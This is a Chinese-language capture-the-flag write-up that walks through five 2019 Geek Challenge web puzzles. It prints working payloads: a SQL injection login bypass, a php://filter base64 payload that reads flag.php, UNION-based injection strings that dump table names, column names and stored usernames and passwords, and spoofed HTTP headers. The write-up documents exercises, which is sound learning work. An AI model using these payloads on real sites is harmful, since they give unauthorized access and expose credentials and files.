[极客大挑战 2019]EasySQL
进题目发现是个登陆页面
admin admin登陆一下
注意URL,试试万能密码?username=admin&password=admin' or '1'='1(tip:当passwd不对时后面的or 1=1恒真导致错误密码也可登陆)
[极客大挑战 2019]Havefun
题目主页是个可爱的小猫
查看源码(weber必做的事哈哈)发现php代码
根据提示传参
[极客大挑战 2019]Secret
哇哦,这背景与文字色
看源码,发现另一个页面
套娃?
再点
因为bp一直再开,看看target,把每个response都看了一下,发现跳转了一个
访问一下给了源码,过滤了../、tp、input、data穿透和代码执行不行了,直接伪协议读,防止输出过滤加上base64encode,payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
读出来的base解码得到flag
[极客大挑战 2019]LoveSQL
和第一题界面差不多,最上面的小红字放大看看,弱密码试试依然错误
我就不用sqlmap了,关于sqlmap扫文件百度有很多,手工sql好了,查列为4的时候报错
联合查询记得把账号置为不存在的(随便输),不然正常回显会把联合查询的回显挤下去,自己可以试试
正常注入,查表名username=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23&password=admin
查列名?username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="l0ve1ysq1"%23&password=admin
查字段?username=1' union select 1,group_concat(id,":",username,":",password),3 from l0ve1ysq1%23&password=admin
太乱了,看源码(快跑~)
[极客大挑战 2019]Http
主页挺好看
没找到有用的信息(Syclover2019招新群:671301484,逃~)看源码
进去看看,考察的是http头信息,具体可百度看师傅们总结的http header
bp抓包加上referer
更改浏览器标识User-AgentXFF伪造IP
get it